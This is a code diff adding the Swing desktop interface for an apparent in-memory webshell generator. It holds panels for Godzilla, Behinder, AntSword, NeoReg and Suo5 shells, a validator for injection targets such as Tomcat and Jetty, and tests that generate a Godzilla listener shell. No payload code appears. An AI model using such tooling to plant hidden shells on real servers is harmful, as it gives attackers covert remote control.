addRandomClassSection();
|
||||
bindText(passField, controller::setAntSwordPass);
|
||||
bindText(headerNameField, controller::setHeaderName);
|
||||
bindText(headerValueField, controller::setHeaderValue);
|
||||
}
|
||||
|
||||
@Override public void refreshFromController() {
|
||||
MemShellFormState s = controller.getState();
|
||||
applyCommonState(s);
|
||||
updating = true;
|
||||
try {
|
||||
passField.setText(s.getAntSwordPass());
|
||||
headerNameField.setText(s.getHeaderName());
|
||||
headerValueField.setText(s.getHeaderValue());
|
||||
} finally { updating = false; }
|
||||
}
|
||||
}
|
||||
+34
@@ -0,0 +1,34 @@
|
||||
package com.reajason.javaweb.desktop.memshell.ui.panel.tool;
|
||||
|
||||
import com.reajason.javaweb.desktop.memshell.controller.MemShellFormController;
|
||||
import com.reajason.javaweb.desktop.memshell.model.MemShellFormState;
|
||||
|
||||
import javax.swing.*;
|
||||
|
||||
public class BehinderToolPanel extends AbstractToolPanel {
|
||||
private final JTextField passField = new JTextField();
|
||||
private final JTextField headerNameField = new JTextField();
|
||||
private final JTextField headerValueField = new JTextField();
|
||||
|
||||
public BehinderToolPanel(MemShellFormController controller, Runnable refreshAll) {
|
||||
super(controller, refreshAll);
|
||||
add(labeled("密码(可选)", passField), "span 2, growx, wrap");
|
||||
add(labeled("请求头名", headerNameField), "growx");
|
||||
add(labeled("请求头值(可选)", headerValueField), "growx, wrap");
|
||||
addRandomClassSection();
|
||||
bindText(passField, controller::setBehinderPass);
|
||||
bindText(headerNameField, controller::setHeaderName);
|
||||
bindText(headerValueField, controller::setHeaderValue);
|
||||
}
|
||||
|
||||
@Override public void refreshFromController() {
|
||||
MemShellFormState s = controller.getState();
|
||||
applyCommonState(s);
|
||||
updating = true;
|
||||
try {
|
||||
passField.setText(s.getBehinderPass());
|
||||
headerNameField.setText(s.getHeaderName());
|
||||
headerValueField.setText(s.getHeaderValue());
|
||||
} finally { updating = false; }
|
||||
}
|
||||
}
|
||||
+99
@@ -0,0 +1,99 @@
|
||||
package com.reajason.javaweb.desktop.memshell.ui.panel.tool;
|
||||
|
||||
import com.reajason.javaweb.desktop.memshell.controller.MemShellFormController;
|
||||
import com.reajason.javaweb.desktop.memshell.model.MemShellFormState;
|
||||
import net.miginfocom.swing.MigLayout;
|
||||
|
||||
import javax.swing.*;
|
||||
|
||||
public class CommandToolPanel extends AbstractToolPanel {
|
||||
private final JPanel paramRow = new JPanel(new MigLayout("insets 0, fillx", "[grow,fill]", "[]"));
|
||||
private final JTextField paramField = new JTextField();
|
||||
private final JPanel headerRow = new JPanel(new MigLayout("insets 0, fillx, gapx 8", "[grow,fill][grow,fill]", "[]"));
|
||||
private final JTextField headerNameField = new JTextField();
|
||||
private final JTextField headerValueField = new JTextField();
|
||||
private final JCheckBox advancedToggle = new JCheckBox("高级配置");
|
||||
private final JPanel advancedPanel = new JPanel(new MigLayout("insets 0, fillx, gapx 8, gapy 2, wrap 2", "[grow,fill][grow,fill]", "[]"));
|
||||
private final JComboBox<String> encryptorCombo = new JComboBox<>();
|
||||
private final JComboBox<String> implCombo = new JComboBox<>();
|
||||
private final JTextField commandTemplateField = new JTextField();
|
||||
|
||||
public CommandToolPanel(MemShellFormController controller, Runnable refreshAll) {
|
||||
super(controller, refreshAll);
|
||||
paramRow.add(labeled("参数名(可选)", paramField), "growx");
|
||||
add(paramRow, "span 2, growx, wrap, hidemode 3");
|
||||
|
||||
headerRow.add(labeled("请求头名", headerNameField), "growx");
|
||||
headerRow.add(labeled("请求头值(可选)", headerValueField), "growx");
|
||||
add(headerRow, "span 2, growx, wrap, hidemode 3");
|
||||
|
||||
add(advancedToggle, "span 2, gapy 2 0, wrap");
|
||||
advancedPanel.add(labeled("加密器", encryptorCombo), "growx");
|
||||
advancedPanel.add(labeled("实现类", implCombo), "growx");
|
||||
advancedPanel.add(labeled("命令模板(可选)", commandTemplateField), "span 2, growx");
|
||||
add(advancedPanel, "span 2, growx, wrap, hidemode 3");
|
||||
|
||||
addRandomClassSection();
|
||||
|
||||
bindText(paramField, controller::setCommandParamName);
|
||||
bindText(headerNameField, controller::setHeaderName);
|
||||
bindText(headerValueField, controller::setHeaderValue);
|
||||
bindText(commandTemplateField, controller::setCommandTemplate);
|
||||
|
||||
encryptorCombo.addActionListener(e -> {
|
||||
if (updating) return;
|
||||
Object item = encryptorCombo.getSelectedItem();
|
||||
controller.setEncryptor(item == null ? "" : String.valueOf(item));
|
||||
});
|
||||
implCombo.addActionListener(e -> {
|
||||
if (updating) return;
|
||||
Object item = implCombo.getSelectedItem();
|
||||
controller.setImplementationClass(item == null ? "" : String.valueOf(item));
|
||||
});
|
||||
advancedToggle.addActionListener(e -> {
|
||||
advancedPanel.setVisible(advancedToggle.isSelected());
|
||||
revalidate();
|
||||
repaint();
|
||||
});
|
||||
}
|
||||
|
||||
@Override public void refreshFromController() {
|
||||
MemShellFormState s = controller.getState();
|
||||
applyCommonState(s);
|
||||
updating = true;
|
||||
boolean layoutVisibilityChanged = false;
|
||||
try {
|
||||
String encryptor = (s.getEncryptor() == null || s.getEncryptor().trim().isEmpty())
|
||||
? (controller.getCommandEncryptors().isEmpty() ? null : controller.getCommandEncryptors().get(0))
|
||||
: s.getEncryptor();
|
||||
String impl = (s.getImplementationClass() == null || s.getImplementationClass().trim().isEmpty())
|
||||
? (controller.getCommandImplementationClasses().isEmpty() ? null : controller.getCommandImplementationClasses().get(0))
|
||||
: s.getImplementationClass();
|
||||
setComboItems(encryptorCombo, controller.getCommandEncryptors(), encryptor);
|
||||
setComboItems(implCombo, controller.getCommandImplementationClasses(), impl);
|
||||
boolean nextParamVisible = controller.isCommandParamVisible();
|
||||
boolean nextHeaderVisible = controller.isCommandHeaderVisible();
|
||||
if (paramRow.isVisible() != nextParamVisible) {
|
||||
layoutVisibilityChanged = true;
|
||||
}
|
||||
if (headerRow.isVisible() != nextHeaderVisible) {
|
||||
layoutVisibilityChanged = true;
|
||||
}
|
||||
paramRow.setVisible(nextParamVisible);
|
||||
headerRow.setVisible(nextHeaderVisible);
|
||||
paramField.setText(s.getCommandParamName());
|
||||
headerNameField.setText(s.getHeaderName());
|
||||
headerValueField.setText(s.getHeaderValue());
|
||||
commandTemplateField.setText(s.getCommandTemplate());
|
||||
boolean nextAdvancedVisible = advancedToggle.isSelected();
|
||||
if (advancedPanel.isVisible() != nextAdvancedVisible) {
|
||||
layoutVisibilityChanged = true;
|
||||
}
|
||||
advancedPanel.setVisible(nextAdvancedVisible);
|
||||
} finally { updating = false; }
|
||||
if (layoutVisibilityChanged) {
|
||||
revalidate();
|
||||
repaint();
|
||||
}
|
||||
}
|
||||
}
|
||||
+131
@@ -0,0 +1,131 @@
|
||||
package com.reajason.javaweb.desktop.memshell.ui.panel.tool;
|
||||
|
||||
import com.reajason.javaweb.desktop.memshell.controller.MemShellFormController;
|
||||
import com.reajason.javaweb.desktop.memshell.model.MemShellFormState;
|
||||
import com.reajason.javaweb.desktop.memshell.service.CustomClassNameParser;
|
||||
import com.reajason.javaweb.desktop.memshell.util.SwingUiUtil;
|
||||
import net.miginfocom.swing.MigLayout;
|
||||
|
||||
import javax.swing.*;
|
||||
import javax.swing.event.DocumentEvent;
|
||||
import javax.swing.event.DocumentListener;
|
||||
import java.awt.event.ActionEvent;
|
||||
import java.io.File;
|
||||
import java.nio.file.Files;
|
||||
import java.util.Base64;
|
||||
|
||||
public class CustomToolPanel extends AbstractToolPanel {
|
||||
private final CustomClassNameParser parser;
|
||||
private final JRadioButton base64Mode = new JRadioButton("Base64", true);
|
||||
private final JRadioButton fileMode = new JRadioButton("File");
|
||||
private final JTextArea base64Area = new JTextArea(4, 40);
|
||||
private final JButton fileButton = new JButton("选择 .class 文件");
|
||||
private final JLabel fileLabel = new JLabel("未选择文件");
|
||||
private final JPanel base64Panel = new JPanel(new MigLayout("insets 0, fillx", "[grow,fill]", "[grow,fill]"));
|
||||
private final JPanel filePanel = new JPanel(new MigLayout("insets 0, fillx, gapx 8", "[grow,fill][]", "[]"));
|
||||
private final Timer parseDebounce;
|
||||
|
||||
public CustomToolPanel(MemShellFormController controller, CustomClassNameParser parser, Runnable refreshAll) {
|
||||
super(controller, refreshAll);
|
||||
this.parser = parser;
|
||||
|
||||
ButtonGroup group = new ButtonGroup();
|
||||
group.add(base64Mode);
|
||||
group.add(fileMode);
|
||||
add(new JLabel("Shell Class"));
|
||||
JPanel radioWrap = new JPanel(new MigLayout("insets 0, gapx 8", "[][]", "[]"));
|
||||
radioWrap.add(base64Mode);
|
||||
radioWrap.add(fileMode);
|
||||
add(radioWrap, "growx, wrap");
|
||||
|
||||
base64Panel.add(new JScrollPane(base64Area), "grow");
|
||||
filePanel.add(fileLabel, "growx");
|
||||
filePanel.add(fileButton);
|
||||
add(base64Panel, "span 2, growx, gapy 1 0, wrap, hidemode 3");
|
||||
add(filePanel, "span 2, growx, gapy 1 0, wrap, hidemode 3");
|
||||
|
||||
addRandomClassSection();
|
||||
|
||||
parseDebounce = new Timer(400, this::parseAndFillClassName);
|
||||
parseDebounce.setRepeats(false);
|
||||
|
||||
base64Area.getDocument().addDocumentListener(new DocumentListener() {
|
||||
@Override public void insertUpdate(DocumentEvent e) { changed(); }
|
||||
@Override public void removeUpdate(DocumentEvent e) { changed(); }
|
||||
@Override public void changedUpdate(DocumentEvent e) { changed(); }
|
||||
private void changed() {
|
||||
if (updating) return;
|
||||
controller.setShellClassBase64(base64Area.getText());
|
||||
parseDebounce.restart();
|
||||
}
|
||||
});
|
||||
|
||||
base64Mode.addActionListener(e -> {
|
||||
if (updating) return;
|
||||
controller.setCustomInputMode("base64");
|
||||
refreshAll.run();
|
||||
});
|
||||
fileMode.addActionListener(e -> {
|
||||
if (updating) return;
|
||||
controller.setCustomInputMode("file");
|
||||
refreshAll.run();
|
||||
});
|
||||
fileButton.addActionListener(this::chooseFile);
|
||||
}
|
||||
|
||||
private void chooseFile(ActionEvent event) {
|
||||
JFileChooser chooser = new JFileChooser();
|
||||
int result = chooser.showOpenDialog(this);
|
||||
if (result != JFileChooser.APPROVE_OPTION) return;
|
||||
File file = chooser.getSelectedFile();
|
||||
try {
|
||||
byte[] bytes = Files.readAllBytes(file.toPath());
|
||||
String base64 = Base64.getEncoder().encodeToString(bytes);
|
||||
controller.setShellClassBase64(base64);
|
||||
fileLabel.setText(file.getName());
|
||||
String className = parser.parseClassName(bytes);
|
||||
controller.setShellClassName(className);
|
||||
refreshAll.run();
|
||||
} catch (Exception ex) {
|
||||
SwingUiUtil.showError(this, "读取自定义类失败: " + ex.getMessage());
|
||||
}
|
||||
}
|
||||
|
||||
private void parseAndFillClassName(ActionEvent ignored) {
|
||||
try {
|
||||
String base64 = controller.getState().getShellClassBase64();
|
||||
if (base64 == null || base64.trim().isEmpty()) return;
|
||||
String className = parser.parseClassNameFromBase64(base64);
|
||||
controller.setShellClassName(className);
|
||||
refreshAll.run();
|
||||
} catch (Exception ignoredEx) {
|
||||
// ignore parse errors while typing/pasting
|
||||
}
|
||||
}
|
||||
|
||||
@Override public void refreshFromController() {
|
||||
MemShellFormState s = controller.getState();
|
||||
applyCommonState(s);
|
||||
updating = true;
|
||||
boolean layoutVisibilityChanged = false;
|
||||
try {
|
||||
base64Mode.setSelected("base64".equalsIgnoreCase(s.getCustomInputMode()));
|
||||
fileMode.setSelected("file".equalsIgnoreCase(s.getCustomInputMode()));
|
||||
boolean nextBase64Visible = base64Mode.isSelected();
|
||||
boolean nextFileVisible = fileMode.isSelected();
|
||||
if (base64Panel.isVisible() != nextBase64Visible) {
|
||||
layoutVisibilityChanged = true;
|
||||
}
|
||||
if (filePanel.isVisible() != nextFileVisible) {
|
||||
layoutVisibilityChanged = true;
|
||||
}
|
||||
base64Panel.setVisible(nextBase64Visible);
|
||||
filePanel.setVisible(nextFileVisible);
|
||||
base64Area.setText(s.getShellClassBase64());
|
||||
} finally { updating = false; }
|
||||
if (layoutVisibilityChanged) {
|
||||
revalidate();
|
||||
repaint();
|
||||
}
|
||||
}
|
||||
}
|
||||
+40
@@ -0,0 +1,40 @@
|
||||
package com.reajason.javaweb.desktop.memshell.ui.panel.tool;
|
||||
|
||||
import com.reajason.javaweb.desktop.memshell.controller.MemShellFormController;
|
||||
import com.reajason.javaweb.desktop.memshell.model.MemShellFormState;
|
||||
import net.miginfocom.swing.MigLayout;
|
||||
|
||||
import javax.swing.*;
|
||||
|
||||
public class GodzillaToolPanel extends AbstractToolPanel {
|
||||
private final JTextField passField = new JTextField();
|
||||
private final JTextField keyField = new JTextField();
|
||||
private final JTextField headerNameField = new JTextField();
|
||||
private final JTextField headerValueField = new JTextField();
|
||||
|
||||
public GodzillaToolPanel(MemShellFormController controller, Runnable refreshAll) {
|
||||
super(controller, refreshAll);
|
||||
add(labeled("密码(可选)", passField), "growx");
|
||||
add(labeled("密钥(可选)", keyField), "growx, wrap");
|
||||
add(labeled("请求头名", headerNameField), "growx");
|
||||
add(labeled("请求头值(可选)", headerValueField), "growx, wrap");
|
||||
addRandomClassSection();
|
||||
bindText(passField, controller::setGodzillaPass);
|
||||
bindText(keyField, controller::setGodzillaKey);
|
||||
bindText(headerNameField, controller::setHeaderName);
|
||||
bindText(headerValueField, controller::setHeaderValue);
|
||||
}
|
||||
|
||||
@Override
|
||||
public void refreshFromController() {
|
||||
MemShellFormState s = controller.getState();
|
||||
applyCommonState(s);
|
||||
updating = true;
|
||||
try {
|
||||
passField.setText(s.getGodzillaPass());
|
||||
keyField.setText(s.getGodzillaKey());
|
||||
headerNameField.setText(s.getHeaderName());
|
||||
headerValueField.setText(s.getHeaderValue());
|
||||
} finally { updating = false; }
|
||||
}
|
||||
}
|
||||
+30
@@ -0,0 +1,30 @@
|
||||
package com.reajason.javaweb.desktop.memshell.ui.panel.tool;
|
||||
|
||||
import com.reajason.javaweb.desktop.memshell.controller.MemShellFormController;
|
||||
import com.reajason.javaweb.desktop.memshell.model.MemShellFormState;
|
||||
|
||||
import javax.swing.*;
|
||||
|
||||
public class NeoRegToolPanel extends AbstractToolPanel {
|
||||
private final JTextField headerNameField = new JTextField();
|
||||
private final JTextField headerValueField = new JTextField();
|
||||
|
||||
public NeoRegToolPanel(MemShellFormController controller, Runnable refreshAll) {
|
||||
super(controller, refreshAll);
|
||||
add(labeled("请求头名", headerNameField), "growx");
|
||||
add(labeled("请求头值(可选)", headerValueField), "growx, wrap");
|
||||
addRandomClassSection();
|
||||
bindText(headerNameField, controller::setHeaderName);
|
||||
bindText(headerValueField, controller::setHeaderValue);
|
||||
}
|
||||
|
||||
@Override public void refreshFromController() {
|
||||
MemShellFormState s = controller.getState();
|
||||
applyCommonState(s);
|
||||
updating = true;
|
||||
try {
|
||||
headerNameField.setText(s.getHeaderName());
|
||||
headerValueField.setText(s.getHeaderValue());
|
||||
} finally { updating = false; }
|
||||
}
|
||||
}
|
||||
+42
@@ -0,0 +1,42 @@
|
||||
package com.reajason.javaweb.desktop.memshell.ui.panel.tool;
|
||||
|
||||
import com.reajason.javaweb.desktop.memshell.controller.MemShellFormController;
|
||||
import com.reajason.javaweb.desktop.memshell.model.MemShellFormState;
|
||||
|
||||
import javax.swing.*;
|
||||
|
||||
public class ProxyToolPanel extends AbstractToolPanel {
|
||||
private final JPanel headerPanel = new JPanel(new net.miginfocom.swing.MigLayout("insets 0, fillx, gapx 8", "[grow,fill][grow,fill]", "[]"));
|
||||
private final JTextField headerNameField = new JTextField();
|
||||
private final JTextField headerValueField = new JTextField();
|
||||
|
||||
public ProxyToolPanel(MemShellFormController controller, Runnable refreshAll) {
|
||||
super(controller, refreshAll);
|
||||
headerPanel.add(labeled("请求头名", headerNameField), "growx");
|
||||
headerPanel.add(labeled("请求头值(可选)", headerValueField), "growx");
|
||||
add(headerPanel, "span 2, growx, wrap, hidemode 3");
|
||||
addRandomClassSection();
|
||||
bindText(headerNameField, controller::setHeaderName);
|
||||
bindText(headerValueField, controller::setHeaderValue);
|
||||
}
|
||||
|
||||
@Override public void refreshFromController() {
|
||||
MemShellFormState s = controller.getState();
|
||||
applyCommonState(s);
|
||||
updating = true;
|
||||
boolean layoutVisibilityChanged = false;
|
||||
try {
|
||||
boolean nextHeaderVisible = controller.isProxyHeaderVisible();
|
||||
if (headerPanel.isVisible() != nextHeaderVisible) {
|
||||
layoutVisibilityChanged = true;
|
||||
}
|
||||
headerPanel.setVisible(nextHeaderVisible);
|
||||
headerNameField.setText(s.getHeaderName());
|
||||
headerValueField.setText(s.getHeaderValue());
|
||||
} finally { updating = false; }
|
||||
if (layoutVisibilityChanged) {
|
||||
revalidate();
|
||||
repaint();
|
||||
}
|
||||
}
|
||||
}
|
||||
+5
@@ -0,0 +1,5 @@
|
||||
package com.reajason.javaweb.desktop.memshell.ui.panel.tool;
|
||||
|
||||
public interface RefreshableToolPanel {
|
||||
void refreshFromController();
|
||||
}
|
||||
+30
@@ -0,0 +1,30 @@
|
||||
package com.reajason.javaweb.desktop.memshell.ui.panel.tool;
|
||||
|
||||
import com.reajason.javaweb.desktop.memshell.controller.MemShellFormController;
|
||||
import com.reajason.javaweb.desktop.memshell.model.MemShellFormState;
|
||||
|
||||
import javax.swing.*;
|
||||
|
||||
public class Suo5ToolPanel extends AbstractToolPanel {
|
||||
private final JTextField headerNameField = new JTextField();
|
||||
private final JTextField headerValueField = new JTextField();
|
||||
|
||||
public Suo5ToolPanel(MemShellFormController controller, Runnable refreshAll) {
|
||||
super(controller, refreshAll);
|
||||
add(labeled("请求头名", headerNameField), "growx");
|
||||
add(labeled("请求头值(可选)", headerValueField), "growx, wrap");
|
||||
addRandomClassSection();
|
||||
bindText(headerNameField, controller::setHeaderName);
|
||||
bindText(headerValueField, controller::setHeaderValue);
|
||||
}
|
||||
|
||||
@Override public void refreshFromController() {
|
||||
MemShellFormState s = controller.getState();
|
||||
applyCommonState(s);
|
||||
updating = true;
|
||||
try {
|
||||
headerNameField.setText(s.getHeaderName());
|
||||
headerValueField.setText(s.getHeaderValue());
|
||||
} finally { updating = false; }
|
||||
}
|
||||
}
|
||||
+12
@@ -0,0 +1,12 @@
|
||||
package com.reajason.javaweb.desktop.memshell.util;
|
||||
|
||||
import java.awt.*;
|
||||
import java.awt.datatransfer.StringSelection;
|
||||
|
||||
public final class ClipboardUtil {
|
||||
private ClipboardUtil() {}
|
||||
|
||||
public static void copyText(String text) {
|
||||
Toolkit.getDefaultToolkit().getSystemClipboard().setContents(new StringSelection(text == null ? "" : text), null);
|
||||
}
|
||||
}
|
||||
+50
@@ -0,0 +1,50 @@
|
||||
package com.reajason.javaweb.desktop.memshell.util;
|
||||
|
||||
import javax.swing.*;
|
||||
import javax.swing.filechooser.FileNameExtensionFilter;
|
||||
import java.awt.*;
|
||||
import java.io.File;
|
||||
import java.io.FileOutputStream;
|
||||
import java.io.IOException;
|
||||
import java.nio.charset.StandardCharsets;
|
||||
import java.util.Base64;
|
||||
|
||||
public final class FileSaveUtil {
|
||||
private FileSaveUtil() {}
|
||||
|
||||
public static void saveText(Component parent, String suggestedName, String content) throws IOException {
|
||||
File file = chooseFile(parent, suggestedName, new FileNameExtensionFilter("Text", "txt"));
|
||||
if (file == null) return;
|
||||
try (FileOutputStream fos = new FileOutputStream(file)) {
|
||||
fos.write((content == null ? "" : content).getBytes(StandardCharsets.UTF_8));
|
||||
}
|
||||
}
|
||||
|
||||
public static void saveBase64AsBytes(Component parent, String suggestedName, String base64, String extension) throws IOException {
|
||||
File file = chooseFile(parent, suggestedName, new FileNameExtensionFilter(extension.toUpperCase(), extension));
|
||||
if (file == null) return;
|
||||
byte[] bytes = Base64.getDecoder().decode(base64 == null ? "" : base64);
|
||||
try (FileOutputStream fos = new FileOutputStream(file)) {
|
||||
fos.write(bytes);
|
||||
}
|
||||
}
|
||||
|
||||
public static void saveBytes(Component parent, String suggestedName, byte[] bytes, String extension) throws IOException {
|
||||
File file = chooseFile(parent, suggestedName, new FileNameExtensionFilter(extension.toUpperCase(), extension));
|
||||
if (file == null) return;
|
||||
try (FileOutputStream fos = new FileOutputStream(file)) {
|
||||
fos.write(bytes);
|
||||
}
|
||||
}
|
||||
|
||||
public static File chooseFile(Component parent, String suggestedName, FileNameExtensionFilter filter) {
|
||||
JFileChooser chooser = new JFileChooser();
|
||||
chooser.setSelectedFile(new File(suggestedName));
|
||||
chooser.setFileFilter(filter);
|
||||
int result = chooser.showSaveDialog(parent);
|
||||
if (result != JFileChooser.APPROVE_OPTION) {
|
||||
return null;
|
||||
}
|
||||
return chooser.getSelectedFile();
|
||||
}
|
||||
}
|
||||
+32
@@ -0,0 +1,32 @@
|
||||
package com.reajason.javaweb.desktop.memshell.util;
|
||||
|
||||
import javax.swing.*;
|
||||
import java.awt.*;
|
||||
|
||||
public final class SwingUiUtil {
|
||||
private SwingUiUtil() {}
|
||||
|
||||
public static JPanel titledPanel(String title, LayoutManager layout) {
|
||||
JPanel panel = new JPanel(layout);
|
||||
panel.setBorder(BorderFactory.createCompoundBorder(
|
||||
BorderFactory.createTitledBorder(title),
|
||||
BorderFactory.createEmptyBorder(6, 6, 6, 6)));
|
||||
return panel;
|
||||
}
|
||||
|
||||
public static void showError(Component parent, String message) {
|
||||
JOptionPane.showMessageDialog(parent, message, "错误", JOptionPane.ERROR_MESSAGE);
|
||||
}
|
||||
|
||||
public static void showInfo(Component parent, String message) {
|
||||
JOptionPane.showMessageDialog(parent, message, "提示", JOptionPane.INFORMATION_MESSAGE);
|
||||
}
|
||||
|
||||
public static void runOnEdt(Runnable runnable) {
|
||||
if (SwingUtilities.isEventDispatchThread()) {
|
||||
runnable.run();
|
||||
} else {
|
||||
SwingUtilities.invokeLater(runnable);
|
||||
}
|
||||
}
|
||||
}
|
||||
+73
@@ -0,0 +1,73 @@
|
||||
package com.reajason.javaweb.desktop.memshell.validation;
|
||||
|
||||
import com.reajason.javaweb.desktop.memshell.model.MemShellFormState;
|
||||
|
||||
import java.util.LinkedHashMap;
|
||||
import java.util.Map;
|
||||
|
||||
public class MemShellValidator {
|
||||
public static class Result {
|
||||
private final Map<String, String> fieldErrors = new LinkedHashMap<>();
|
||||
|
||||
public boolean isValid() {
|
||||
return fieldErrors.isEmpty();
|
||||
}
|
||||
|
||||
public Map<String, String> getFieldErrors() {
|
||||
return fieldErrors;
|
||||
}
|
||||
|
||||
public void add(String field, String message) {
|
||||
fieldErrors.put(field, message);
|
||||
}
|
||||
|
||||
public String firstMessage() {
|
||||
return fieldErrors.values().stream().findFirst().orElse("");
|
||||
}
|
||||
}
|
||||
|
||||
public Result validate(MemShellFormState s) {
|
||||
Result r = new Result();
|
||||
required(r, "server", s.getServer(), "请选择服务类型");
|
||||
required(r, "serverVersion", s.getServerVersion(), "请选择服务版本");
|
||||
required(r, "shellTool", s.getShellTool(), "请选择内存马工具");
|
||||
required(r, "shellType", s.getShellType(), "请选择内存马挂载类型");
|
||||
required(r, "packingMethod", s.getPackingMethod(), "请选择打包方式");
|
||||
|
||||
if (needsUrlPattern(s.getShellType()) && isInvalidUrl(s.getUrlPattern())) {
|
||||
r.add("urlPattern", "请使用具体 URL 路径,不能为 / 或 /*");
|
||||
}
|
||||
if ("Custom".equals(s.getShellTool()) && (s.getShellClassBase64() == null || s.getShellClassBase64().trim().isEmpty())) {
|
||||
r.add("shellClassBase64", "自定义内存马 Class(Base64) 不能为空");
|
||||
}
|
||||
if ("TongWeb".equals(s.getServer()) && "Valve".equals(s.getShellType()) && "Unknown".equals(s.getServerVersion())) {
|
||||
r.add("serverVersion", "TongWeb Valve 模式需要指定服务版本");
|
||||
}
|
||||
if ("Jetty".equals(s.getServer())
|
||||
&& ("Handler".equals(s.getShellType()) || "JakartaHandler".equals(s.getShellType()))
|
||||
&& "Unknown".equals(s.getServerVersion())) {
|
||||
r.add("serverVersion", "Jetty Handler 模式需要指定服务版本");
|
||||
}
|
||||
return r;
|
||||
}
|
||||
|
||||
public boolean needsUrlPattern(String shellType) {
|
||||
if (shellType == null || shellType.trim().isEmpty()) return false;
|
||||
if (shellType.startsWith("Agent")) return false;
|
||||
return shellType.endsWith("Servlet") ||
|
||||
shellType.endsWith("ControllerHandler") ||
|
||||
shellType.equals("HandlerMethod") ||
|
||||
shellType.equals("HandlerFunction") ||
|
||||
shellType.endsWith("WebSocket");
|
||||
}
|
||||
|
||||
public boolean isInvalidUrl(String urlPattern) {
|
||||
return urlPattern == null || urlPattern.trim().isEmpty() || "/".equals(urlPattern) || "/*".equals(urlPattern) || !urlPattern.startsWith("/");
|
||||
}
|
||||
|
||||
private void required(Result r, String field, String value, String message) {
|
||||
if (value == null || value.trim().isEmpty()) {
|
||||
r.add(field, message);
|
||||
}
|
||||
}
|
||||
}
|
||||
+51
@@ -0,0 +1,51 @@
|
||||
package com.reajason.javaweb.desktop.memshell.controller;
|
||||
|
||||
import com.reajason.javaweb.desktop.memshell.service.ConfigCatalogService;
|
||||
import com.reajason.javaweb.desktop.memshell.validation.MemShellValidator;
|
||||
import org.junit.jupiter.api.Test;
|
||||
|
||||
import java.util.List;
|
||||
|
||||
import static org.junit.jupiter.api.Assertions.*;
|
||||
|
||||
class MemShellFormControllerTest {
|
||||
|
||||
@Test
|
||||
void shouldAdjustJdkForSpringWebFluxAndResetDependentFields() {
|
||||
MemShellFormController controller = new MemShellFormController(new ConfigCatalogService(), new MemShellValidator());
|
||||
controller.setServerVersion("Unknown");
|
||||
controller.setUrlPattern("/abc");
|
||||
|
||||
controller.setServer("SpringWebFlux");
|
||||
|
||||
assertEquals("52", controller.getState().getTargetJdkVersion());
|
||||
assertEquals("", controller.getState().getUrlPattern());
|
||||
assertNotNull(controller.getState().getShellTool());
|
||||
assertFalse(controller.getState().getShellTool().isEmpty());
|
||||
}
|
||||
|
||||
@Test
|
||||
void shouldFilterAgentPackersForAgentShellType() {
|
||||
MemShellFormController controller = new MemShellFormController(new ConfigCatalogService(), new MemShellValidator());
|
||||
controller.setShellType("AgentFilterChain");
|
||||
List<?> filtered = controller.getFilteredPackers();
|
||||
assertFalse(filtered.isEmpty());
|
||||
assertTrue(controller.getFilteredPackers().stream().allMatch(p -> p.getName().startsWith("Agent")));
|
||||
}
|
||||
|
||||
@Test
|
||||
void shouldToggleRandomClassNameAndRestoreValues() {
|
||||
MemShellFormController controller = new MemShellFormController(new ConfigCatalogService(), new MemShellValidator());
|
||||
controller.setRandomClassName(false);
|
||||
controller.setShellClassName("a.b.C");
|
||||
controller.setInjectorClassName("x.y.Z");
|
||||
|
||||
controller.setRandomClassName(true);
|
||||
assertEquals("", controller.getState().getShellClassName());
|
||||
assertEquals("", controller.getState().getInjectorClassName());
|
||||
|
||||
controller.setRandomClassName(false);
|
||||
assertEquals("a.b.C", controller.getState().getShellClassName());
|
||||
assertEquals("x.y.Z", controller.getState().getInjectorClassName());
|
||||
}
|
||||
}
|
||||
+34
@@ -0,0 +1,34 @@
|
||||
package com.reajason.javaweb.desktop.memshell.service;
|
||||
|
||||
import org.junit.jupiter.api.Test;
|
||||
|
||||
import java.io.ByteArrayOutputStream;
|
||||
import java.io.IOException;
|
||||
import java.io.InputStream;
|
||||
import java.util.Base64;
|
||||
|
||||
import static org.junit.jupiter.api.Assertions.*;
|
||||
|
||||
class CustomClassNameParserTest {
|
||||
@Test
|
||||
void shouldParseClassNameFromClassBytesAndBase64() throws Exception {
|
||||
CustomClassNameParser parser = new CustomClassNameParser();
|
||||
byte[] bytes = readOwnClassBytes();
|
||||
String expected = this.getClass().getName();
|
||||
|
||||
assertEquals(expected, parser.parseClassName(bytes));
|
||||
assertEquals(expected, parser.parseClassNameFromBase64(Base64.getEncoder().encodeToString(bytes)));
|
||||
}
|
||||
|
||||
private byte[] readOwnClassBytes() throws IOException {
|
||||
String resource = "/" + this.getClass().getName().replace('.', '/') + ".class";
|
||||
InputStream in = this.getClass().getResourceAsStream(resource);
|
||||
assertNotNull(in);
|
||||
try (InputStream is = in; ByteArrayOutputStream out = new ByteArrayOutputStream()) {
|
||||
byte[] buf = new byte[4096];
|
||||
int n;
|
||||
while ((n = is.read(buf)) != -1) out.write(buf, 0, n);
|
||||
return out.toByteArray();
|
||||
}
|
||||
}
|
||||
}
|
||||
+29
@@ -0,0 +1,29 @@
|
||||
package com.reajason.javaweb.desktop.memshell.service;
|
||||
|
||||
import com.reajason.javaweb.desktop.memshell.controller.MemShellFormController;
|
||||
import com.reajason.javaweb.desktop.memshell.model.DesktopMemShellGenerateResult;
|
||||
import com.reajason.javaweb.desktop.memshell.validation.MemShellValidator;
|
||||
import org.junit.jupiter.api.Test;
|
||||
|
||||
import static org.junit.jupiter.api.Assertions.*;
|
||||
|
||||
class GenerationServiceTest {
|
||||
@Test
|
||||
void shouldGenerateTomcatGodzillaListenerWithBase64Packer() {
|
||||
MemShellFormController controller = new MemShellFormController(new ConfigCatalogService(), new MemShellValidator());
|
||||
controller.setServer("Tomcat");
|
||||
controller.setShellTool("Godzilla");
|
||||
controller.setShellType("Listener");
|
||||
controller.setPacker("Base64");
|
||||
|
||||
GenerationService service = new GenerationService();
|
||||
DesktopMemShellGenerateResult result = service.generate(controller.getState().copy());
|
||||
|
||||
assertNotNull(result);
|
||||
assertEquals("Base64", result.getPackMethod());
|
||||
assertNotNull(result.getPackResult());
|
||||
assertFalse(result.getPackResult().isEmpty());
|
||||
assertNotNull(result.getMemShellResult().getShellBytesBase64Str());
|
||||
assertNotNull(result.getMemShellResult().getInjectorBytesBase64Str());
|
||||
}
|
||||
}
|
||||
+56
@@ -0,0 +1,56 @@
|
||||
package com.reajason.javaweb.desktop.memshell.ui;
|
||||
|
||||
import org.junit.jupiter.api.Assumptions;
|
||||
import org.junit.jupiter.api.Test;
|
||||
|
||||
import javax.swing.*;
|
||||
import java.awt.*;
|
||||
|
||||
import static org.junit.jupiter.api.Assertions.*;
|
||||
|
||||
